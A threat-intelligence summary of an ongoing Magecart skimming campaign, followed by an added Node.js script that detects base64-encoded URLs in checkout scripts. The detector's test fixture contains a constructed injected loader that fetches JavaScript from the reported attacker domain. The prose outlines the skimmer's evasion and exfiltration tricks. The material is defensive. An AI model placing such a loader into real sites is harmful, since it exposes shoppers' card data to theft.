An active Magecart campaign targeting ecommerce sites has been uncovered, featuring payloads customized per victim with sophisticated evasion techniques. The attack begins with a script injection disguised as a Google Tag Manager loader, which decodes a base64 URL at runtime to inject malicious JavaScript. The skimmer includes admin detection to avoid triggering for site owners, anti-debugging via performance.now() timing, and platform fingerprinting for WooCommerce, Magento, OpenCart, and PrestaShop. It injects a fake payment form styled to match the real one, captures card data to localStorage, and exfiltrates it — including a 'CSP bypass' technique that redirects victims through attacker infrastructure with stolen data in the URL before bouncing them back. The campaign is ongoing, with the malicious domain styleoutsperee.com (registered Feb 2026) as the key indicator of compromise. Defenders are advised to audit checkout scripts, monitor for requests to that domain, and investigate unexpected redirects during payment flows.
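An added example (not part of the original report, and not code from the campaign): a Node.js helper for the "audit checkout scripts" advice above. It finds quoted base64 literals in script source that decode to URLs and flags hosts matching the reported domain. The function names, the two sample scripts and the URL path are constructed for illustration.

```javascript
// Added example: flag base64 string literals in script source that decode to URLs.
const IOC_DOMAINS = ['styleoutsperee.com']; // indicator named in the report

// Quoted literals made only of base64 characters, 16+ long.
const B64_LITERAL = /['"`]([A-Za-z0-9+\/]{16,}={0,2})['"`]/g;

// Return a URL object if the literal decodes to an absolute or
// protocol-relative URL, otherwise null.
function decodeUrl(b64) {
  const text = Buffer.from(b64, 'base64').toString('utf8');
  if (!/^(https?:)?\/\/[\w.-]+/i.test(text)) return null;
  try {
    return new URL(text.startsWith('//') ? 'https:' + text : text);
  } catch {
    return null;
  }
}

// One finding per decoded URL; IoC hosts (and subdomains) are 'high',
// any other runtime-decoded URL is 'review'.
function auditScript(source) {
  const findings = [];
  for (const m of source.matchAll(B64_LITERAL)) {
    const url = decodeUrl(m[1]);
    if (!url) continue;
    const host = url.hostname.toLowerCase();
    const ioc = IOC_DOMAINS.some((d) => host === d || host.endsWith('.' + d));
    findings.push({ host, ioc, severity: ioc ? 'high' : 'review', literal: m[1] });
  }
  return findings;
}

// Constructed samples (the path is made up; only the domain comes from the report).
const encoded = Buffer.from('https://styleoutsperee.com/constructed-path.js').toString('base64');
const SAMPLE_INJECTED =
  `(function(w,d,s){var j=d.createElement(s);j.async=true;` +
  `j.src=atob("${encoded}");d.head.appendChild(j);})(window,document,"script");`;
const SAMPLE_GENUINE_GTM =
  `(function(w,d,s,l,i){w[l]=w[l]||[];var j=d.createElement(s);` +
  `j.src="https://www.googletagmanager.com/gtm.js?id="+i;` +
  `d.head.appendChild(j);})(window,document,"script","dataLayer","GTM-XXXXXXX");`;

console.log(auditScript(SAMPLE_INJECTED));
console.log(auditScript(SAMPLE_GENUINE_GTM));
```

A 'review' finding is not proof of compromise; it marks a URL that static review of the page source would not show in plain text.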